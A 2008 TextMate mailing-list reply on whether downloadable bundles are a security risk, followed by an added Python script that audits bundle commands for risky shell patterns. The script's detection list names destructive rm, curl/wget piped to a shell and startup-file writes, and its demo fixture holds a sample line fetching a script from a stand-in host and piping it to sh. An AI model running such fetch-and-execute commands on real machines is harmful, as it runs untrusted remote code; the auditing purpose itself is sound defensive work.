[TxMt] Re: GitHub bundles and security?

Ale Muñoz bomberstudios at gmail.com
Tue Dec 23 18:58:08 UTC 2008


On Tue, Dec 23, 2008 at 1:53 PM, Geoffrey Hutchison
<geoff at geoffhutchison.net> wrote:
> technically speaking, GetBundles lets you
> download unknown bundles which can execute arbitrary code on my machine.

Remember, you are downloading code from public code repositories, where you can

a) check the code for security issues

b) identify the creator and report those issues

I think if somebody were to include malicious code in a bundle, it
would be kicked out of the community quite fast...

On the other hand, code does not always work as expected and yes,
there is a risk some script running out of control ends up erasing
your whole hard disk... But I think we've done a pretty good job until
now (meaning: all stuff in edge is pretty well tested before it gets
out in a public release : )

Me, I'd rather have an open space, nicely gardened by volunteers than
a walled sandbox.

Just my 0.02


-- 
Ale Muñoz
http://sofanaranja.com
http://bomberstudios.com
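The reply above rests on point (a): the user can read the code before running it. The script below is an added example of what that check can look like in practice; it is not code from the original thread, from TextMate or from GetBundles. It assumes the standard bundle layout, a directory with a Commands/ folder whose *.tmCommand files are XML property lists holding the shell script under the "command" key, extracts every such script and flags constructs a reviewer would want to read closely. The pattern list is a heuristic starting point and the sample bundle it audits is constructed inline for demonstration.

```python
"""Audit the shell code inside a TextMate bundle before installing it.

Added example, not code from the original thread or from GetBundles.
Each Commands/*.tmCommand file in a bundle is an XML plist whose
'command' key holds a shell script that TextMate runs on your behalf.
"""
import os
import plistlib
import re
import tempfile

# Heuristics a human reviewer would want to look at. Assumption: this list
# is illustrative; a real audit still means reading the whole command.
RISKY_PATTERNS = [
    ("destructive rm",
     re.compile(r"\brm\s+(-[a-zA-Z]*[rR][a-zA-Z]*f|-[a-zA-Z]*f[a-zA-Z]*[rR])\b")),
    ("remote code piped to a shell",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|k)?sh\b")),
    ("privilege escalation", re.compile(r"\bsudo\b")),
    ("eval of dynamic content", re.compile(r"\beval\b")),
    ("writes to shell startup files",
     re.compile(r"~/\.(bash_profile|bashrc|zshrc|profile)\b")),
]


def extract_commands(bundle_dir):
    """Return [(filename, command text)] for every Commands/*.tmCommand.

    A file that is not a valid plist is returned with command None so the
    caller can flag it rather than silently skip it.
    """
    commands = []
    cmd_dir = os.path.join(bundle_dir, "Commands")
    if not os.path.isdir(cmd_dir):
        return commands
    for name in sorted(os.listdir(cmd_dir)):
        if not name.endswith(".tmCommand"):
            continue
        with open(os.path.join(cmd_dir, name), "rb") as f:
            try:
                plist = plistlib.load(f)
            except Exception:  # malformed plist: still worth a look
                commands.append((name, None))
                continue
        commands.append((name, plist.get("command", "")))
    return commands


def audit_bundle(bundle_dir):
    """Return {filename: [finding, ...]} for commands that need review."""
    findings = {}
    for name, command in extract_commands(bundle_dir):
        if command is None:
            findings[name] = ["unparseable plist"]
            continue
        hits = [label for label, rx in RISKY_PATTERNS if rx.search(command)]
        if hits:
            findings[name] = hits
    return findings


def write_sample_bundle(root):
    """Create a small constructed bundle (not a real one) to audit."""
    bundle = os.path.join(root, "Demo.tmbundle")
    cmd_dir = os.path.join(bundle, "Commands")
    os.makedirs(cmd_dir)
    samples = {
        "Word Count.tmCommand": {"name": "Word Count", "command": "wc -w"},
        "Install Helper.tmCommand": {
            "name": "Install Helper",
            "command": "curl -s http://example.invalid/helper.sh | sh\n",
        },
        "Clean Build.tmCommand": {
            "name": "Clean Build",
            "command": 'rm -rf "$TM_PROJECT_DIRECTORY/build"',
        },
    }
    for fname, plist in samples.items():
        with open(os.path.join(cmd_dir, fname), "wb") as f:
            plistlib.dump(plist, f)
    return bundle


def run_demo():
    """Build the constructed bundle, audit it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_bundle(write_sample_bundle(tmp))


if __name__ == "__main__":
    for fname, hits in run_demo().items():
        print(f"{fname}: {', '.join(hits)}")
```

Point the script at an unpacked *.tmbundle directory instead of the constructed one to audit a real download; anything it flags is a command to read in full before letting TextMate run it, and an empty report is not a clean bill of health, since a bundle can also carry shell code in snippets and in supporting scripts outside Commands/.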

